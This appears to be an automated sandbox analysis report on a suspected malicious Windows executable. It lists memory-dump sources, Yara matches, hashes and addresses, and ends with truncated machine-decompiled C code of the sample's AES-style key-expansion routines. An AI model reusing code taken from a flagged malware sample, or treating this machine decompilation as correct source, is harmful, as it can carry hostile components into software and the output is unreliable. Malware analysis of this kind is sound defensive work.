                                                                                                                                                              0x0041b73e
                                                                                                                                                              0x0041b745
                                                                                                                                                              0x0041b74c
                                                                                                                                                              0x0041b753
                                                                                                                                                              0x0041b75f
                                                                                                                                                              0x0041b76c
                                                                                                                                                              0x0041b772
                                                                                                                                                              0x0041b778
                                                                                                                                                              0x0041b783
                                                                                                                                                              0x0041b792
                                                                                                                                                              0x0041b79e
                                                                                                                                                              0x0041b7a6
                                                                                                                                                              0x0041b7ca
                                                                                                                                                              0x0041b7d1
                                                                                                                                                              0x0041b7d8
                                                                                                                                                              0x0041b7df
                                                                                                                                                              0x0041b7e0
                                                                                                                                                              0x0041b7f2
                                                                                                                                                              0x0041b7f9
                                                                                                                                                              0x0041b80b
                                                                                                                                                              0x0041b823
                                                                                                                                                              0x0041b82e
                                                                                                                                                              0x0041b834
                                                                                                                                                              0x0041b83a
                                                                                                                                                              0x0041b840
                                                                                                                                                              0x0041b841
                                                                                                                                                              0x0041b846
                                                                                                                                                              0x0041b84c
                                                                                                                                                              0x0041b858
                                                                                                                                                              0x0041b85a
                                                                                                                                                              0x0041b860
                                                                                                                                                              0x0041b867
                                                                                                                                                              0x0041b874
                                                                                                                                                              0x0041b8a2
                                                                                                                                                              0x0041b8b1
                                                                                                                                                              0x0041b8b7
                                                                                                                                                              0x0041b8bd
                                                                                                                                                              0x0041b8c3
                                                                                                                                                              0x0041b8c4
                                                                                                                                                              0x0041b8d6
                                                                                                                                                              0x0041b8dd
                                                                                                                                                              0x0041b8e3
                                                                                                                                                              0x0041b8e9
                                                                                                                                                              0x0041b8ec
                                                                                                                                                              0x0041b8f6
                                                                                                                                                              0x0041b8fc
                                                                                                                                                              0x0041b90d
                                                                                                                                                              0x0041b91b
                                                                                                                                                              0x0041b924
                                                                                                                                                              0x0041b92b
                                                                                                                                                              0x0041b931
                                                                                                                                                              0x0041b94f
                                                                                                                                                              0x0041b955
                                                                                                                                                              0x0041b95b
                                                                                                                                                              0x0041b961
                                                                                                                                                              0x0041b96b
                                                                                                                                                              0x0041b971
                                                                                                                                                              0x0041b977
                                                                                                                                                              0x0041b97f
                                                                                                                                                              0x0041b986
                                                                                                                                                              0x0041b98c
                                                                                                                                                              0x0041b993
                                                                                                                                                              0x0041b999
                                                                                                                                                              0x0041b99a
                                                                                                                                                              0x0041b99a
                                                                                                                                                              0x0041b9a0
                                                                                                                                                              0x0041b9a6
                                                                                                                                                              0x0041b9ad
                                                                                                                                                              0x0041b9b3
                                                                                                                                                              0x0041b9b9
                                                                                                                                                              0x0041b9bf
                                                                                                                                                              0x0041b9c5
                                                                                                                                                              0x0041b9cb
                                                                                                                                                              0x0041b9d2
                                                                                                                                                              0x0041b9d8
                                                                                                                                                              0x0041b9de
                                                                                                                                                              0x0041b9e4
                                                                                                                                                              0x0041b9ea
                                                                                                                                                              0x0041b9f0
                                                                                                                                                              0x0041b9f6
                                                                                                                                                              0x0041b9c5
                                                                                                                                                              0x0041b867
                                                                                                                                                              0x0041b80b
                                                                                                                                                              0x0041b792
                                                                                                                                                              0x0041b716
                                                                                                                                                              0x0041b6ab
                                                                                                                                                              0x0041b640
                                                                                                                                                              0x0041b607
                                                                                                                                                              0x00000000

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 3c806c79598fff0f4efb839588f173da98a1e990db291e7c6b8c5632a631fb77
                                                                                                                                                              • Instruction ID: 256b1eb0af8396fc020ad171b26df71a4c7e7ede835aeb931592cd4e5c7c3667
                                                                                                                                                              • Opcode Fuzzy Hash: 3c806c79598fff0f4efb839588f173da98a1e990db291e7c6b8c5632a631fb77
                                                                                                                                                              • Instruction Fuzzy Hash: 90C17932909795CFD726DF38D9CA7413FB2F352324B08424EC8A297196D7742955CF86
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0094FBD7, Relevance: .3, Instructions: 254COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4b5a1ff670a1a518a4181d5b3230e6e5d8c51108795b75f944aebacd049c03fe
                                                                                                                                                              • Instruction ID: 788201c06ab974d49f0fd38d24f17f5fa60f9a6880ff1e1a05f4d4316fd23330
                                                                                                                                                              • Opcode Fuzzy Hash: 4b5a1ff670a1a518a4181d5b3230e6e5d8c51108795b75f944aebacd049c03fe
                                                                                                                                                              • Instruction Fuzzy Hash: BD91A175D0025B8BCF34DF94C4506FDB7B5FF95701FA8842AE882A7196E7349882CBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00977B00, Relevance: .3, Instructions: 252COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7d8e1e2a5a6a4964145bdf9193a246bda9ec3521fead953568eb1d9add5f077b
                                                                                                                                                              • Instruction ID: 6460dd6de32635a9e233b0ce21df8137e6ff4558324a9b045430757d3ba7ffdc
                                                                                                                                                              • Opcode Fuzzy Hash: 7d8e1e2a5a6a4964145bdf9193a246bda9ec3521fead953568eb1d9add5f077b
                                                                                                                                                              • Instruction Fuzzy Hash: C5717A32609256CFEB158E68C5C02BE775AFBD2314B34C6B6E496CF64AD634C843E351
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009F63BF, Relevance: .2, Instructions: 233COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d9ea8a5cce64cf5c216998eda348521a406c0f5b5e816de941c4428d2ab67aee
                                                                                                                                                              • Instruction ID: 38c5691675ba6de2003811a63e13a458d77036f08122f3b5ac1f6bc74ecfb414
                                                                                                                                                              • Opcode Fuzzy Hash: d9ea8a5cce64cf5c216998eda348521a406c0f5b5e816de941c4428d2ab67aee
                                                                                                                                                              • Instruction Fuzzy Hash: 0A915E72520B0ACFDB25CF29C485676BBE4FF05368B248A5CE5E6DB1A0C378E951DB00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0094E0C6, Relevance: .2, Instructions: 232COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 79060cd5def60bc397e396e54b8238ce396b6322d31da7bb28e3b958a71492d5
                                                                                                                                                              • Instruction ID: ba827ebf8829d89ce7413494b25a979d13e2cbc82c62b9c81a18bd7bbdf5104e
                                                                                                                                                              • Opcode Fuzzy Hash: 79060cd5def60bc397e396e54b8238ce396b6322d31da7bb28e3b958a71492d5
                                                                                                                                                              • Instruction Fuzzy Hash: 7481FF719052499FDF25CF6AC884FBEBBB9FF84314F148568E8268B292D334DA05CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00980D3B, Relevance: .2, Instructions: 229COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d29057e861a732b4ac2a14fcb8bea8550a492b198ebcbd8764d1de0b5c1eb7d1
                                                                                                                                                              • Instruction ID: 23419ba5aa3ca93597b3af0f8a7db477588e958dc8e6a4a61f3b00daa8e89230
                                                                                                                                                              • Opcode Fuzzy Hash: d29057e861a732b4ac2a14fcb8bea8550a492b198ebcbd8764d1de0b5c1eb7d1
                                                                                                                                                              • Instruction Fuzzy Hash: 53918C70605205DFDF19CF98C4D0E7ABBBAFF89301F258499D8869B292D734AD45CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009DD13F, Relevance: .2, Instructions: 222COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a6b61d8947e044f2419fa9a0f08421d513cc681f26731c42c2cdfc03258a4942
                                                                                                                                                              • Instruction ID: f0e09bf66fa568a70251ba750eabd33c0d382f7abe1ca567341c5c9d80899777
                                                                                                                                                              • Opcode Fuzzy Hash: a6b61d8947e044f2419fa9a0f08421d513cc681f26731c42c2cdfc03258a4942
                                                                                                                                                              • Instruction Fuzzy Hash: 6481D075A822068BDF2C8E54C0846ADB36AEB94325F19C23FEE75577E5C674C840CF85
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0097D005, Relevance: .2, Instructions: 221COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e61a2a6744698a6178f281a2d8e0c18e059a5d8b4269ca761abbce59d39922d6
                                                                                                                                                              • Instruction ID: 42afae96199fb4d041ecf37061bb47df0edb32079a97e4291f412dcfe721a571
                                                                                                                                                              • Opcode Fuzzy Hash: e61a2a6744698a6178f281a2d8e0c18e059a5d8b4269ca761abbce59d39922d6
                                                                                                                                                              • Instruction Fuzzy Hash: 2591F5B3908226CBCB248F09C4905B93BB2FF64751B25806EFD854B391D734C992E7E0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009EF8EE, Relevance: .2, Instructions: 188COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c109baa334e3652430d7979c3560b10f1842c76fddc44d5bb437de5c68dfd01b
                                                                                                                                                              • Instruction ID: be81dba602a40f0d0b2bff8d377ba8d2085d25f73d9b526fd12ef1915f5d7042
                                                                                                                                                              • Opcode Fuzzy Hash: c109baa334e3652430d7979c3560b10f1842c76fddc44d5bb437de5c68dfd01b
                                                                                                                                                              • Instruction Fuzzy Hash: 7F61D2315002A19FDB268F12C468BBBBBB9EF56714F5581BAD4482F291E3389D41CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0099A37B, Relevance: .2, Instructions: 175COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 39dde085c6a191906b9795add49c746ba361df8d831570da3a1428994a0d920a
                                                                                                                                                              • Instruction ID: 583cbad6d8706a82338c9c73a3db46bba505166ba602d2e1b177464e4e7bbfb9
                                                                                                                                                              • Opcode Fuzzy Hash: 39dde085c6a191906b9795add49c746ba361df8d831570da3a1428994a0d920a
                                                                                                                                                              • Instruction Fuzzy Hash: A051E173E105259BE7408E19CC40259B6A3EBC4314F2FC679EC28DB385DABAED12C6C0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00985485, Relevance: .2, Instructions: 172COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 238c5462d830519deeb7df7a2aad9945a249f10f4e18cb06f3d53aa4dc851a76
                                                                                                                                                              • Instruction ID: 39d9af9d2d3bb8c7b32a2a3302904ce465df635199d27ad06dd151bbc50f9a5e
                                                                                                                                                              • Opcode Fuzzy Hash: 238c5462d830519deeb7df7a2aad9945a249f10f4e18cb06f3d53aa4dc851a76
                                                                                                                                                              • Instruction Fuzzy Hash: D9514876F40521CBC715CB5ECC449A8B7E6FB8832271E81B6D959D7362CA30AC438B84
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402D90, Relevance: .2, Instructions: 165COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 67%
                                                                                                                                                              			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}
















                                                                                                                                                              0x00402d93
                                                                                                                                                              0x00402d98
                                                                                                                                                              0x00402da0
                                                                                                                                                              0x00402da9
                                                                                                                                                              0x00402db3
                                                                                                                                                              0x00402dba
                                                                                                                                                              0x00402dc3
                                                                                                                                                              0x00402dce
                                                                                                                                                              0x00402dd6
                                                                                                                                                              0x00402ddf
                                                                                                                                                              0x00402dea
                                                                                                                                                              0x00402df0
                                                                                                                                                              0x00402df5
                                                                                                                                                              0x00402dfe
                                                                                                                                                              0x00402e09
                                                                                                                                                              0x00402e11
                                                                                                                                                              0x00402e1a
                                                                                                                                                              0x00402e25
                                                                                                                                                              0x00402e2d
                                                                                                                                                              0x00402e36
                                                                                                                                                              0x00402e41
                                                                                                                                                              0x00402e49
                                                                                                                                                              0x00402e52
                                                                                                                                                              0x00402e5d
                                                                                                                                                              0x00402e65
                                                                                                                                                              0x00402e6e
                                                                                                                                                              0x00402e80
                                                                                                                                                              0x00402e83
                                                                                                                                                              0x00402f9f
                                                                                                                                                              0x00402fa4
                                                                                                                                                              0x00402e89
                                                                                                                                                              0x00402e89
                                                                                                                                                              0x00402e8c
                                                                                                                                                              0x00402e8e
                                                                                                                                                              0x00402e91
                                                                                                                                                              0x00402e91
                                                                                                                                                              0x00402ef6
                                                                                                                                                              0x00402efb
                                                                                                                                                              0x00402efd
                                                                                                                                                              0x00402f03
                                                                                                                                                              0x00402f05
                                                                                                                                                              0x00402f0b
                                                                                                                                                              0x00402f0d
                                                                                                                                                              0x00402f10
                                                                                                                                                              0x00402f16
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402f72
                                                                                                                                                              0x00402f78
                                                                                                                                                              0x00402f7a
                                                                                                                                                              0x00402f80
                                                                                                                                                              0x00402f82
                                                                                                                                                              0x00402f87
                                                                                                                                                              0x00402f88
                                                                                                                                                              0x00402f8b
                                                                                                                                                              0x00402f8e
                                                                                                                                                              0x00402f91
                                                                                                                                                              0x00402f97
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402f97
                                                                                                                                                              0x00402fae
                                                                                                                                                              0x00402fae
                                                                                                                                                              0x00000000

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                              • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                                                                                                                                              • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                              • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402D87, Relevance: .2, Instructions: 161COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E00402D87(signed int __ebx, void* __ecx, void* __esi, intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t69;
				signed int _t73;
				signed int* _t75;
				signed int* _t89;
				signed int _t102;
				signed int _t104;
				signed int _t114;
				signed int _t116;
				signed int* _t118;
				signed int _t135;
				signed int _t137;
				signed int _t141;
				signed int _t162;
				intOrPtr _t184;

				_t73 = __ebx &  *(__esi - 0x4c0835a5);
				asm("cmpsd");
				 *(__ecx + 0x55) =  *(__ecx + 0x55) | 0x0000008b;
				_t89 = _a12;
				_t118 = _a8;
				_push(_t73);
				_push(__esi);
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t118 =  *_t89 & 0xff00ff00 |  *_t89 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[1] = _t89[1] & 0xff00ff00 | _t89[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
